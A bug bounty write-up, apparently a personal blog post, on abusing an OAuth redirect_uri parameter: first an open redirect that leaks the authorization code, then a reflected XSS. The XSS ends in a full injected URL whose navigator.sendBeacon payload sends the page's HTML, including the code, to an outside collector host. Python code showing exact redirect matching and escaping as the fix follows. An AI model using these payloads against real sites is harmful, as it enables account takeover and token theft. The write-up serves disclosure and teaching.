Never Give Up, The Story Behind a Dupe-To-Triaged

This is the story of how I got a dupe (within 24 hours!) and then found another (valid) vulnerability with the same impact.

The application used OAuth to authenticate. The authorization endpoint looked like the following:
https://victim.com/auth?client_id=&nonce=[REDACTED]&redirect_uri=https://www.victim.com/dashboard&request=[TOKEN_REDACTED]&response_type=code&scope=openid+accounts&state=[REDACTED]

After seeing that, I quickly changed the redirect_uri parameter to point to my server and saw the application redirect me to it… so this was an Open Redirect vulnerability on victim.com. Let's turn it into an Account Takeover!

In my PoC, all I did was make the redirect_uri parameter point to my server, because the OAuth code is sent in the request too. So that was easy. I wrote the report, sent it, and after 3 days I got the duplicate notification…

[Image: my submission (left), the dupe (right)]

Keep trying

I thought for a while about how to get an Account Takeover with a different technique. And then an idea popped into my head like an XSS alert popup ;-)

If I could exploit an XSS vulnerability in that endpoint, maybe I could steal the OAuth token, and that's it! I built the following PoC:

https://victim.com/auth?client_id=&nonce=[REDACTED]&redirect_uri=https://www.victim.com/dashboard%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e&request=[TOKEN_REDACTED]&response_type=code&scope=openid+accounts&state=[REDACTED]

It worked!

But what makes the difference between a simple JavaScript popup and an ATO (Account Takeover)? A cool payload. So let's try to figure it out (thanks @mastersec!)

Final Payload:

navigator.sendBeacon('https://ssrftest.com/x/AAAAA',document.documentElement.innerHTML.split('code'));

Final URL:

https://victim.com/auth?client_id=&nonce=[REDACTED]&redirect_uri=aaa"><script>navigator.sendBeacon('https://ssrftest.com/x/AAAAA',document.documentElement.innerHTML.split('code'));</script>&request=[TOKEN_REDACTED]&response_type=code&scope=openid+accounts&state=[REDACTED]

And the result was the authentication token submitted to the server I control. WIN
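Both findings above come from the same parameter: redirect_uri was neither matched exactly against the client's registered URI nor HTML-escaped when reflected into the page. The following is an added example, not code from the write-up or from the affected application, of the server-side check that closes both holes; the client id and the registered URI are constructed values.

```python
import html
from typing import Tuple
from urllib.parse import urlsplit

# Constructed registration data: what an authorization server keeps per client.
# "example-client" is a hypothetical id; the write-up redacts the real one.
REGISTERED_REDIRECT_URIS = {
    "example-client": {"https://www.victim.com/dashboard"},
}


def redirect_uri_allowed(client_id: str, redirect_uri: str) -> bool:
    """Exact-string match against the client's registered URIs (RFC 6749 3.1.2.2).

    No prefix or substring matching: a value that merely starts with the
    registered URI, such as one with '">...' appended, must fail, and an
    unregistered host must fail even if it looks similar.
    """
    allowed = REGISTERED_REDIRECT_URIS.get(client_id, set())
    if redirect_uri not in allowed:
        return False
    # Defence in depth: absolute https URL, no fragment.
    parts = urlsplit(redirect_uri)
    return parts.scheme == "https" and bool(parts.netloc) and not parts.fragment


def render_error_page(redirect_uri: str) -> str:
    """Show a rejected value to the user without redirecting.

    html.escape(quote=True) neutralises <, >, &, " and ', so the reflected
    value cannot break out of the attribute or text context it lands in.
    """
    safe = html.escape(redirect_uri, quote=True)
    return f'<p>Invalid redirect_uri: <code title="{safe}">{safe}</code></p>'


def handle_authorize(client_id: str, redirect_uri: str) -> Tuple[int, str]:
    """Simplified /auth decision: 302 only to a registered URI, otherwise a
    400 with an escaped error page. The authorization code is never attached
    to an unregistered destination."""
    if redirect_uri_allowed(client_id, redirect_uri):
        return 302, redirect_uri
    return 400, render_error_page(redirect_uri)
```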

I submitted the vulnerability and finally, after 2 days, it got triaged and I received the bounty $$$ :-)

So, always remember, KEEP TRYING!

I hope you enjoyed this write-up. Happy hacking and hunting!

Hope you liked the post! If you would like to contact me, please visit https://www.cintainfinita.com or write to contact@cintainfinita.com.ar.

#BugBounty #BugBountyTips #Hacking

Information Security Consultant, Researcher & Illusionist